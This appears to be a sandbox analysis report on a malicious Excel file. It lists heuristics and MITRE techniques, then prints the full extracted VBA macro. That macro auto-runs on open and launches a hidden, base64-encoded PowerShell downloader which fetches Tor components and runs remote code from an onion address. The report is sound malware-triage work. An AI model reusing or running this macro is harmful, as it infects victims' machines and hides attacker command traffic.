MALICIOUS
352
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
This Excel document contains a Workbook_Open VBA macro that utilizes WScript.Shell to execute a PowerShell command. The macro appears to construct a PowerShell command that downloads a file from 'http://8.8.8.8' and executes it. This indicates a downloader or dropper functionality, aiming to fetch and run a secondary malicious payload. The presence of encoded commands and references to PowerShell and WScript.Shell strongly suggests a malicious intent.
Heuristics 11
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Set a = CreateObject("WScript.Shell") -
PowerShell reference in VBA critical OLE_VBA_PSPowerShell reference in VBAMatched line in script
a.Run "powershell.exe" & " -noexit -encodedcommand " & b, 0, False -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set a = CreateObject("WScript.Shell") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub Workbook_Open() -
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMANDExtracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/sharepoint/v3/contenttype/forms In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
- http://schemas.microsoft.com/office/2006/metadata/contentTypeIn document text (OLE body)
- http://schemas.microsoft.com/office/2006/metadata/properties/In document text (OLE body)
- http://schemas.microsoft.com/office/2006/metadata/properties/metaAttributesIn document text (OLE body)
- http://schemas.microsoft.com/office/2006/metadata/propertiesIn document text (OLE body)
- http://www.w3.org/2001/XMLSchemaIn document text (OLE body)
- http://schemas.microsoft.com/office/2006/documentManagement/typesIn document text (OLE body)
- http://schemas.openxmlformats.org/package/2006/metadata/core-propertiesIn document text (OLE body)
- http://www.w3.org/2001/XMLSchema-instanceIn document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://purl.org/dc/terms/In document text (OLE body)
- http://schemas.microsoft.com/office/internal/2005/internalDocumentationIn document text (OLE body)
- http://dublincore.org/schemas/xmls/qdc/2003/04/02/dc.xsdIn document text (OLE body)
- http://dublincore.org/schemas/xmls/qdc/2003/04/02/dcterms.xsdIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7341 bytes |
SHA-256: a65de640c462134037f8fa3b3294abf2d46e809173e7c1290a110dec890f2268 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 8 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
b = "JwBBAG4AUABhAEEAUABGAGIAeQB5ACcAOwAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnADsAJwB4AFQAaABuAEwAVwBIAE8AWQBYACcAOwAnAEIAVQB4AHMATwBXAGwAagAnADsAJABjAGsAbwB2ACAAPQAgACgAZwBlAHQALQB3AG0AaQBvAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAEMAbwBtAHAAdQB0AGUAcgBTAHkAcwB0AGUAbQBQAHIAbwBkAHUAYwB0ACkALgBVAFUASQBEADsAJwBWAGUAYQBCACcAOwAnAEEASwBTAFAARABUAGUAJwA7AGkAZgAgACgAKABnAHAAIABIAEsAQwBVADoAXABcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFIAdQBuACkAIAAtAG0AYQB0AGMAaAAgACQAYwBrAG8AdgApAHsAOwAnAEwAWgBOAEUATABBAGEAJwA7ACcAbwB4AE8ATwBJAGoAQgB3ACcAOwAoAEcAZQB0AC0AUAByAG8AYwBlAHMAcwAgAC0AaQBkACAAJABwAGkAZAApAC4ASwBpAGwAbAAoACkAOwAnAHMAaQBnAHUAWABoACcA" _
& "OwAnAHgAYwBCAEQAUwBTAGgARABoACcAOwB9ADsAJwBNAHoAVwBBAGgAeQBMAG8AJwA7ACcAaQBQAGUAVAAnADsAZgB1AG4AYwB0AGkAbwBuACAAZQAoACQAeABtAGcAKQB7ADsAJwBOAGIAVgBZAHUAYgBnAE4AaQAnADsAJwBaAEwAYQB1AEEAVwBOACcAOwAkAHUAZgAgAD0AIAAoACgAKABpAGUAeAAgACIAbgBzAGwAbwBvAGsAdQBwACAALQBxAHUAZQByAHkAdAB5AHAAZQA9AHQAeAB0ACAAJAB4AG0AZwAgADgALgA4AC4AOAAuADgAIgApACAALQBtAGEAdABjAGgAIAAnACIAJwApACAALQByAGUAcABsAGEAYwBlACAAJwAiACcALAAgACcAJwApAFsAMABdAC4AVAByAGkAbQAoACkAOwAnAEoAVABZAFYATABxACcAOwAnAEIAWgBrAGcAdQBRACcAOwAkAGgAagB3AGgALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAdQBmACwAIAAkAHAAegB6AG4AKQA7ACcAcQBCAGIAWQBUAFMAQQAnADsAJwBUAHAAagBCAE8ATABmACcAOwAkAHQAZwBqACAAPQAgACQAeQBoAGQAaAAuAE4AYQBtAGUAUwBwAGEAYwBlACgAJABwAHoAegBuACkALgBJAHQAZQBtAHMAKAApADsAJwBVAHQAaQB6AGkAbwBNACcAOwAnAGsAcQBYAE0AZQBiACcA" _
& "OwAkAHkAaABkAGgALgBOAGEAbQBlAFMAcABhAGMAZQAoACQAcwBrACkALgBDAG8AcAB5AEgAZQByAGUAKAAkAHQAZwBqACwAIAAyADAAKQA7ACcAVgBNAGQAeQBQAHUAeQBUAFEASQAnADsAJwBpAGYAVgBMAGQAJwA7AHIAZAAgACQAcAB6AHoAbgA7ACcATgBsAHkARABZAHAAZwBHAFQAQgAnADsAJwBsAGYAWgBKAHEAdwBuAEcAJwA7AH0AOwAnAEoASwAnADsAJwBGAG8AZwBLACcAOwAnAHcAWQBUAGsARwBGAGMAZABMAFAAJwA7ACcAcwB4AFIASABVAHcAcwAnADsAJwBxAGEASwBpAGYAdAAnADsAJwBoAFgASgBoAGoAegBYAEIAZgB3AHIAJwA7ACQAcwBrACAAPQAgACQAZQBuAHYAOgBBAFAAUABEAEEAVABBACAAKwAgACcAXAAnACAAKwAgACQAYwBrAG8AdgA7ACcAUgBLAHgAZQBWAGkAJwA7ACcAdQBIAEkAegBPAEQAZQBlAEQAVQAnADsAaQBmACAAKAAhACgAVABlAHMAdAAtAFAAYQB0AGgAIAAkAHMAawApACkAewA7ACcAagBDAE0AWgBxAEcAVABiAG4AcQAnADsAJwBxAEYAYwBKAGsAQwBxAHAAaQAnADsAJABnAGIAagAgAD0AIABOAGUAdwAtAEkAdABlAG0AIAAtAEkAdABlAG0AVAB5AHAAZQAgAEQAaQByAGUAYwB0AG8A" _
& "cgB5ACAALQBGAG8AcgBjAGUAIAAtAFAAYQB0AGgAIAAkAHMAawA7ACcAaQBFAG4AJwA7ACcAdgBoAG4AVgBZACcAOwAkAGcAYgBqAC4AQQB0AHQAcgBpAGIAdQB0AGUAcwAgAD0AIAAiAEgAaQBkAGQAZQBuACIALAAgACIAUwB5AHMAdABlAG0AIgAsACAAIgBOAG8AdABDAG8AbgB0AGUAbgB0AEkAbgBkAGUAeABlAGQAIgA7ACcAUwByAHMATQBhAFkAcwB2ACcAOwAnAGwASwBHAHkAeQBRAHAAJwA7AH0AOwAnAGYAaABTAHoARABPAGYAQQAnADsAJwBPAEUAcgBJAHcAbgAnADsAJwBqAEkAagB5ACcAOwAnAG0AVABSAHEASgBJAEgAJwA7ACQAbABiAD0AJABzAGsAKwAgACcAXAB0AG8AcgAuAGUAeABlACcAOwAnAEkAUABlAHAAagBJAGQAJwA7ACcAcgBrAEwAbAB1AEIAeABPAEMARQBDACcAOwAkAGsAaABmAHUAPQAkAHMAawArACAAJwBcAHAAbwBsAGkAcABvAC4AZQB4AGUAJwA7ACcAYwBCAHIAegBHAGsAVQBPACcAOwAnAFEAUQBjACcAOwAkAHAAegB6AG4APQAkAHMAawArACcAXAAnACsAJABjAGsAbwB2ACsAJwAuAHoAaQBwACcAOwAnAFQAcgBYAGoAJwA7ACcAYQBtAHYAaAB6AEgAUwB1ACcAOwAkAGgAagB3AGgAPQBOAGUA" _
& "dwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJwBTAGUAVQBmAEMAZwB6AGoAJwA7ACcAagBwAHkAbQB0AEEAaABtAEkAJwA7ACQAeQBoAGQAaAA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAIABTAGgAZQBsAGwALgBBAHAAcABsAGkAYwBhAHQAaQBvAG4AOwAnAGEASQBLAG0AVABZAEIAbABXACcAOwAnAEkAYgBVAFMARgBKAG8AbQBOAFYARAAnADsAJwBKAFQARwAnADsAJwBOAHQAJwA7AGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABsAGIAKQAgAC0AbwByACAAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABrAGgAZgB1ACkAKQB7ADsAJwB2AG8AZAAnADsAJwBTAGsAeABjAFkAVAAnADsAZQAgACcAaQAuAHYAYQBuAGsAaQBuAC4AZABlACcAOwAnAFcAcABQAEcAWgB2AHkARABOACcAOwAnAEUAcQBmAGgATQB2ACcAOwB9ADsAJwBRAHgAVQBaAFMAdQAnADsAJwBRAEcAbwAnADsAJwB4AGIAcQBwAEYAUABZAFAAbgB2AFAAJwA7ACcAbwB5ACcAOwBpAGYAIAAoACEAKABUAGUAcwB0AC0AUABhAHQAaAAgACQAbABiACkAIAAtAG8AcgAgACEAKABUAGUA" _
& "cwB0AC0AUABhAHQAaAAgACQAawBoAGYAdQApACkAewA7ACcAQgBJAEUAYQBJACcAOwAnAE8AaABmAG4AQgBlAFIAVgBuAE4AJwA7AGUAIAAnAGcAZwAuAGkAYgBpAHoALgBjAGMAJwA7ACcATgBOACcAOwAnAHoAYwBkAGwASwBhAGYAawBsAHoAdwAnADsAfQA7ACcAVQBYAFkAWABPAGYAaABwAE8AJwA7ACcAQwBZAGsARgBKACcAOwAnAG0ATAByACcAOwAnAEUAVQBIAGkAZgBRAEUAZQBOAGgAJwA7ACQAdABoAGIAdgA9ACQAcwBrACsAJwBcAHIAbwBhAG0AaQBuAGcAbABvAGcAJwA7ACcAcgB4AGwAcwBjAEUAVgBYAGIAJwA7ACcAdwBEAHgAWgBtAGoATABjAHYATgBQACcAOwBzAGEAcABzACAAJABsAGIAIAAtAEEAcgAgACIAIAAtAC0ATABvAGcAIABgACIAbgBvAHQAaQBjAGUAIABmAGkAbABlACAAJAB0AGgAYgB2AGAAIgAiACAALQB3AGkAIABIAGkAZABkAGUAbgA7ACcAbwBEAFoATABNAFgATABwAGwATwBKACcAOwAnAEMAcQBRAFEAVQBZAGsATgAnADsAZABvAHsAcwBsAGUAZQBwACAAMQA7ACQAdQB5AD0AZwBjACAAJAB0AGgAYgB2AH0AdwBoAGkAbABlACgAIQAoACQAdQB5ACAALQBtAGEAdABjAGgAIAAnAEIAbwBvAHQA" _
& "cwB0AHIAYQBwAHAAZQBkACAAMQAwADAAJQA6ACAARABvAG4AZQAuACcAKQApADsAJwBTAFIAagBvAFoASwBQACcAOwAnAGUAUgBXAHQAcgBiAGoAeQAnADsAcwBhAHAAcwAgACQAawBoAGYAdQAgAC0AYQAgACIAcwBvAGMAawBzAFAAYQByAGUAbgB0AFAAcgBvAHgAeQA9AGwAbwBjAGEAbABoAG8AcwB0ADoAOQAwADUAMAAiACAALQB3AGkAIABIAGkAZABkAGUAbgA7ACcARQBrAEgASQByAE4ASQAnADsAJwBXAHoAawBYAHQAQwAnADsAcwBsAGUAZQBwACAANwA7ACcATQBvAGkAZQB2AE0AYgAnADsAJwBxAE8ASABJAHIASgBXAGcAJwA7ACQAbgByAGEAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFAAcgBvAHgAeQAoACIAbABvAGMAYQBsAGgAbwBzAHQAOgA4ADEAMgAzACIAKQA7ACcAWgBqAHgAZgBDAEwAJwA7ACcASQBWAE8AVQBLAEkAbQAnADsAJABuAHIAYQAuAHUAcwBlAEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzACAAPQAgACQAdAByAHUAZQA7ACcAbwB0AFQAZwBDAHAAeQAnADsAJwBTAG8AUgB5AFQAdQBUAFcAQgAnADsAJABoAGoAdwBoAC4AcAByAG8A" _
& "eAB5AD0AJABuAHIAYQA7ACcAcABMAEcAYwAnADsAJwBXAHUAVgBGAEoAagAnADsAJABwAGoAPQAnAGgAdAB0AHAAOgAvAC8AcABvAHcAZQByAHcAbwByAG0AagBxAGoANAAyAGgAdQAuAG8AbgBpAG8AbgAvAGcAZQB0AC4AcABoAHAAPwBzAD0AcwBlAHQAdQBwACYAbQBvAG0APQA0AEMANABDADQANQA0ADQALQAwADAANABEAC0ANQAxADEAMAAtADgAMAAzADUALQBDADYAQwAwADQARgA0ADYAMwAyADUAMwAmAHUAaQBkAD0AJwAgACsAIAAkAGMAawBvAHYAOwAnAEIATwAnADsAJwBIAFUAYwBsAFAAUgBMAE0AZABiAHAAJwA7AHcAaABpAGwAZQAoACEAJABiAG0AKQB7ACQAYgBtAD0AJABoAGoAdwBoAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJABwAGoAKQB9ADsAJwBiAGUAZQBnAEEAVQBwACcAOwAnAHAARwBZACcAOwBpAGYAIAAoACQAYgBtACAALQBuAGUAIAAnAG4AbwBuAGUAJwApAHsAOwAnAHoAYgBrAGEAeABtACcAOwAnAHgAUABZAEUAdwBlAEMAbQBnAFEAJwA7AGkAZQB4ACAAJABiAG0AOwAnAGcAdwBFAFYAZABCAEIAJwA7ACcATgBEAHMAQwB3AFIAbQBzAEYAcgAnADsAfQA7ACcAegBKAE4AQwBDAHgA" _
& "JwA7AA=="
Set a = CreateObject("WScript.Shell")
a.Run "powershell.exe" & " -noexit -encodedcommand " & b, 0, False
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.